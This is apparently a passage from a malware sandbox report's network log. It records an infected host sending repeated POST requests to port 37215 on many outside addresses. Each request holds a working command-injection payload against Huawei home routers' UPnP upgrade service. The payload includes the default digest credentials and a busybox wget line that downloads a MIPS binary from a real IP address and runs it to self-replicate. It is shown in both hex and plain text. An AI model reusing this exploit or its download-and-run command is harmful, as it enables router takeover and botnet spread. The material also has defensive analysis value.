69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  182192.168.2.1345666157.2.61.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665693045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  183192.168.2.1345466197.27.207.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665780067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  184192.168.2.134138041.135.24.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665783882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  185192.168.2.135660841.22.114.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665816069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  186192.168.2.1342316157.65.30.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665838957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  187192.168.2.1346350157.97.76.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665864944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  188192.168.2.134877241.44.8.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665899038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  189192.168.2.133375441.89.204.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665956020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  190192.168.2.1335574197.0.160.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665961981 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  191192.168.2.1354068197.29.156.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665986061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  192192.168.2.1345264204.222.36.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666050911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
